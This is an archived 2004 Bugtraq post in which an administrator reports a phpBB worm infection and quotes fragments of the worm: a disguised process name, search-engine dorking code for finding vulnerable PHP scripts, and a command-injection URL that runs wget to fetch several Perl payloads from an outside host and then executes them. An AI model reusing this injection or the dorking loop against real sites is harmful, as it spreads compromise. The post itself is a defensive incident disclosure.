PHPBB worm in action

From: Colin Keith (bugtraq_at_ckeith.clara.net)
Date: 12/25/04

  • Next message: Chris Ess: "RE: phpBB Worm" 
    Date: Sat, 25 Dec 2004 03:04:23 +0000
To: bugtraq@securityfocus.com

    Hello,

    I discovered tonight that a copy of the PHPBB worm had broken in through
    a script a customer was running and was busy running around googling and
    generating lists of sites. There have been a couple of intrusions but
    they appear to be the same version. I thought I'd pass on the files that
    were on the server in case anyone is interested.

    The processes that were left running were called:

     /usr/local/sbin/httpd - spy

    which is the process name from php.txt:

     my $processo = "/usr/local/sbin/httpd - spy";

    This file contains the component that talks to Google:

     $procura = 'inurl:*.php?*=' . $numr;
     for($n=0;$n<900;$n += 10){
     $sock = IO::Socket::INET->new(PeerAddr => "www.google.com.br", PeerPort => 80, Proto => "tcp") or next;
     print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n";

    and then parses the results for URLs :)

    It also gets them from Yahoo!:

     for($cadenu=1;$cadenu <= 991; $cadenu +=10){
     @cade = get("http://cade.search.yahoo.com/search?p=$procura&ei=UTF-8&fl=0&all=1&pstart=1&b=$cadenu")
     or next;

    The basis for all of these worms is:

     $lista1 = 'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget www.visualcoders.net/spybot.txt;wget www.visualcoders.net/worm1.txt;wget www.visualcoders.net/php.txt;wget www.visualcoders.net/ownz.txt;wget www.visualcoders.net/zone.txt;perl spybot.txt;perl worm1.txt;perl ownz.txt;perl php.txt';

    I've included copies of these in the tarball so people can look for
    themselves :)

    Happy holidays.
    Colin. 

    --
If jugglers juggle.
And Smugglers smuggle.
Then what else can a snuggler do :)

  • Next message: Chris Ess: "RE: phpBB Worm"